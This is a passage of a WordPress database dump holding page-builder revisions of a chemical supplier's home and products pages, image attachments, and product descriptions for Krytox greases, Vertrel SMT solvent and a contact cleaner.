span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2202"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2201"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2199"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-30 13:33:40', '2016-09-30 13:33:40', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2204, 2, '2016-09-30 13:34:25', '2016-09-30 13:34:25', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Quality &amp; Service</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MS-MEDICAL" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1588" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2202"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2201"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2200"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2199"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-30 13:34:25', '2016-09-30 13:34:25', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2205, 2, '2016-09-30 13:38:57', '2016-09-30 13:38:57', '', 'glidesys', '', 'inherit', 'closed', 'closed', '', 'glidesys-2', '', '', '2016-09-30 13:38:57', '2016-09-30 13:38:57', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/glidesys-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2206, 2, '2016-09-30 13:39:00', '2016-09-30 13:39:00', '', 'releasys', '', 'inherit', 'closed', 'closed', '', 'releasys-3', '', '', '2016-09-30 13:39:00', '2016-09-30 13:39:00', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/releasys-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2207, 2, '2016-09-30 13:39:48', '2016-09-30 13:39:48', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Quality &amp; Service</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MS-MEDICAL" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1588" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2202"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2201"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-30 13:39:48', '2016-09-30 13:39:48', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2208, 2, '2016-09-30 13:47:02', '2016-09-30 13:47:02', '', 'vertrel', '', 'inherit', 'closed', 'closed', '', 'vertrel-4', '', '', '2016-09-30 13:47:02', '2016-09-30 13:47:02', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2209, 2, '2016-09-30 13:48:14', '2016-09-30 13:48:14', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Quality &amp; Service</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MS-MEDICAL" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1588" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2202"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-30 13:48:14', '2016-09-30 13:48:14', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2210, 2, '2016-09-30 17:30:39', '2016-09-30 17:30:39', '[product_categories number="10" parent="0" columns="4" title="Miller Stephenson Products"]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60"]\r\n<p class="alt-font lead"><strong><em><span class="fancy-underline">INTRODUCING</span></em></strong></p>\r\n[divider]\r\n<h1><strong>ReleaSys ™ </strong></h1>\r\n<h4 class="thin-font">Semi-Permanent Mold Release</h4>\r\n[button text="TELL ME MORE" style="white alt-button" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]', 'Products', '', 'inherit', 'closed', 'closed', '', '116-revision-v1', '', '', '2016-09-30 17:30:39', '2016-09-30 17:30:39', '', 116, 'https://www.miller-stephenson.com/116-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2211, 0, '2016-09-30 18:11:16', '2016-09-30 18:11:16', '', '', '', 'publish', 'closed', 'closed', '', '2211', '', '', '2016-09-30 18:11:16', '2016-09-30 18:11:16', '', 0, 'https://www.miller-stephenson.com/nf_sub/2211/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2212, 0, '2016-09-30 20:31:43', '2016-09-30 20:31:43', '', '', '', 'publish', 'closed', 'closed', '', '2212', '', '', '2016-09-30 20:31:43', '2016-09-30 20:31:43', '', 0, 'https://www.miller-stephenson.com/nf_sub/2212/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2213, 0, '2016-10-01 18:53:25', '2016-10-01 18:53:25', '', '', '', 'publish', 'closed', 'closed', '', '2213', '', '', '2016-10-01 18:53:25', '2016-10-01 18:53:25', '', 0, 'https://www.miller-stephenson.com/nf_sub/2213/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2215, 2, '2016-10-05 19:19:22', '2016-10-05 19:19:22', 'Krytox AUT 2045 performance lubricants offer a wide range of high quality, high performance lubricants to address the most challenging and complex requirements of original equipment manufacturers (OEMs) and world-class Tier One suppliers. Our family of oils, greases, and coatings will provide long-term operational excellence and high performance lubrication in extreme operating conditions.\n\nAutomotive design engineers have learned that specifying Krytox AUT 2045 during the design phase can provide OEMs with significant cost savings. By lengthening the life of critical components and improving consumer satisfaction, Krytox™ lubricants help reduce repair costs and potentially save millions in warranty claims.\n\nAutomakers are striving for extended warranties, expecting longer intervals between vehicle service visits and very limited relubrication operations. Krytox™ lubricants have provided state-of-the art performance for mechanical systems, such as gearboxes, bearings, chains, seals, actuators, valves, and other components. Krytox™ lubricants don’t oxidize; they provide excellent lubricity and a high viscosity index through a broad range of viscosity grades. Most applications where Krytox™ lubricants are specified are considered by OEMs to be lubricated for the expected lifetime of the vehicle.\n\nProtection of the environment and people is a core value of Chemours. Our sustainability goals go beyond traditional footprint reduction to include goals that tie our business growth to the development of safer and environmentally improved new products and sustainable solutions.\n\nKrytox AUT 2045 provides longer lasting lubrication, which lowers the frequency of relubrication; therefore, reducing the use of materials and reducing waste—important steps in helping to reduce product impact on the environment.', 'AUT 2045', 'Krytox AUT 2045 is a white grease based on perfluoropolyether (PFPE). PFPE lubricants demonstrate outstanding product life and unequaled performance. AUT 2045, like most greases, combines the base oil with polytetrafluoroethylene (PTFE) powder as a thickener. The use of PFPE as a base oil provides superior chemical and thermal stability to all grease product lines.\n<br /><br />\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '713-autosave-v1', '', '', '2016-10-05 19:19:22', '2016-10-05 19:19:22', '', 713, 'https://www.miller-stephenson.com/713-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2217, 2, '2016-10-03 13:29:07', '2016-10-03 13:29:07', '', '', '', 'publish', 'closed', 'closed', '', '2217', '', '', '2016-10-03 13:29:07', '2016-10-03 13:29:07', '', 0, 'https://www.miller-stephenson.com/nf_sub/2217/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2218, 2, '2016-10-03 13:29:55', '2016-10-03 13:29:55', '', '', '', 'publish', 'closed', 'closed', '', '2218', '', '', '2016-10-03 13:29:55', '2016-10-03 13:29:55', '', 0, 'https://www.miller-stephenson.com/nf_sub/2218/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2222, 2, '2016-10-05 19:26:51', '2016-10-05 19:26:51', 'Krytox AUT 2E45 greases offer the potential for lubed-for-life properties in demanding electrical motor service. Krytox greases are non-oxidizing, water-resistant, nonflammable, and chemically inert.\n\nKrytox AUT 2E45 greases contain perfluoropolyether (PFPE) oil and a polytetrafluoroethylene (PTFE) thickener.\n\nThe PFPE oil and PTFE thickener will not oxidize and gum up like ordinary synthetic or hydrocarbon-based greases. Krytox greases are recommended by many major bearing manufacturers for long-life lubrication in severe applications. The superior film-forming capability of Krytox greases provide a thicker oil layer and reduce wear. Krytox greases are compatible with metals and most seal materials, but require removal of all old lubricants from the motor bearings before application.\n\nKrytox AUT 2E45 grease offers the following benefits and features:\n<strong>Unsurpassed oxidation resistance of base oil </strong>\nPFPE will not oxidize and gum up with age and use. Will not break down with high temperatures experienced in electric motors. Operating temperature range from –44 to 200 °C (–47 to 392 °F)\n\n<strong>Advanced PTFE thickener</strong>\nSpecial high efficiency thickener will not oxidize or break down with shear\n\n<strong>Lubed-for-life potential</strong>\nTypically, no need to re-lubricate bearings during lifetime of electric motor\n\n<strong>Excellent corrosion resistance</strong>\nAdditives offer resistance to corrosion and rust during storage and in wet environments\n\n\n', 'AUT 2E45', 'Krytox AUT 2E45 grease is a nitrite-free lubricant, formulated with anti-rust additives that are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.\n<br /><br />\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '717-autosave-v1', '', '', '2016-10-05 19:26:51', '2016-10-05 19:26:51', '', 717, 'https://www.miller-stephenson.com/717-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2223, 0, '2016-10-03 16:46:13', '2016-10-03 16:46:13', '', '', '', 'publish', 'closed', 'closed', '', '2223', '', '', '2016-10-03 16:46:13', '2016-10-03 16:46:13', '', 0, 'https://www.miller-stephenson.com/nf_sub/2223/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2224, 27, '2016-10-03 16:57:08', '2016-10-03 16:57:08', '', '', '', 'publish', 'closed', 'closed', '', '2224', '', '', '2016-10-03 16:57:08', '2016-10-03 16:57:08', '', 0, 'https://www.miller-stephenson.com/nf_sub/2224/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2225, 0, '2016-10-03 17:06:18', '2016-10-03 17:06:18', '', '', '', 'publish', 'closed', 'closed', '', '2225', '', '', '2016-10-03 17:06:18', '2016-10-03 17:06:18', '', 0, 'https://www.miller-stephenson.com/nf_sub/2225/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2226, 2, '2016-10-03 17:31:37', '2016-10-03 17:31:37', 'Vertrel SMT is a proprietary azeotrope of <a href="https://www.miller-stephenson.com/product/vertrel-xf/">Vertrel XF</a> hydrofluorocarbon (2,3 dihydrodeca-fluoropentane) with trans-1,2-dichloroethylene and methanol. It is ideally suited for use in vapor degreasing equipment with solvency power for cleaning ionic soils and flux residues from electronic assemblies. It can also be used for precision and general industrial cleaning where this enhanced solvency is required.\r\n\r\nVertrel SMT has “zero” ozone-depletion potential, and low global warming potential. It can replace CFC-113, 1,1,1-trichloroethane (1,1,1-TCA), hydrochlorofluorocarbons (HCFCs), and perfluorocarbons (PFCs) in many applications. Vertrel SMT is accepted by the U.S. Environmental Protection Agency under the Significant New Alternatives Policy (SNAP) program, as a substitute for ozone-depleting substances.\r\n\r\nMost plastics commonly used for components mounted on printed wiring board assemblies can be safely cleaned in Vertrel SMT. Acrylic, ABS, and poly-carbonate parts, particularly if under stress, may show slight cracking or crazing damage and should be tested. EPDM, butyl rubber, Buna-S, and neoprene are recommended for elastomeric parts. Elastomer swelling and shrinking will, in most cases, revert to within a few percent of original size after air drying. Swell, shrinkage, and extractables are strongly affected by the compounding agents, plasticizers, and curing used in the manufacture of plastics and elastomers. Therefore, prior in-use testing is particularly important.\r\n\r\nVertrel SMT was found compatible with aluminum, copper, and iron, with and without rosin flux present, after exposure for two weeks at 120°C (248°F) in sealed tubes. Large amounts of water may extract alcohol and affect cleaning performance. Therefore, to reduce alcohol loss, use desiccant dryers rather than water separators in the condensate return line.\r\n\r\nVertrel SMT exhibits no closed cup or open cup flash point and is not classified as a flammable liquid by NFPA or DOT. However, the product does exhibit vapor flammability limits in air. Users should clear equipment of all vapors and liquids before performing any maintenance operations that could result in an ignition source.\r\n\r\nContact with highly basic process materials, pH 10 or above, is not recommended.\r\n\r\nhttps://www.miller-stephenson.com/opteon-sion-vapor-degreasing/', 'Vertrel SMT', 'Vapor degreasing should be used for optimum cleaning effectiveness and economy. Modern vapor containment technology is recommended for both batch and in-line equipment. These systems have higher freeboard and a secondary set of low-temperature (–29°C [–20°F]) condenser coils to reduce vapor loss.', 'publish', 'closed', 'closed', '', 'vertrel-smt', '', '', '2016-10-13 17:04:33', '2016-10-13 17:04:33', '', 0, 'https://www.miller-stephenson.com/?post_type=product&#038;p=2226', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (2227, 2, '2016-10-03 17:23:06', '2016-10-03 17:23:06', '', 'vertrel smt', '', 'inherit', 'closed', 'closed', '', 'vertrel-smt-2', '', '', '2016-10-03 17:23:19', '2016-10-03 17:23:19', '', 2226, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/Vertrel-SMT.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2228, 2, '2016-10-03 17:42:04', '2016-10-03 17:42:04', '', 'Contact Re-Nu®', 'An economical cleaning agent that restores electrical or mechanical continuity on all types of contacts. Removes oxides, oil, grease and dust from electrical contacts, relays, encoders, slide wires, rheostats, distribution panels and switching devices. Evaporates quickly and leaves no residue. No ODC (ozone depleting chemicals).\n<br/>\nDeposits Light Coating of Oil to protect against moisture and corrosion.', 'inherit', 'closed', 'closed', '', '1292-autosave-v1', '', '', '2016-10-03 17:42:04', '2016-10-03 17:42:04', '', 1292, 'https://www.miller-stephenson.com/1292-autosave-v1/', 0, 'revision', '', 0); 
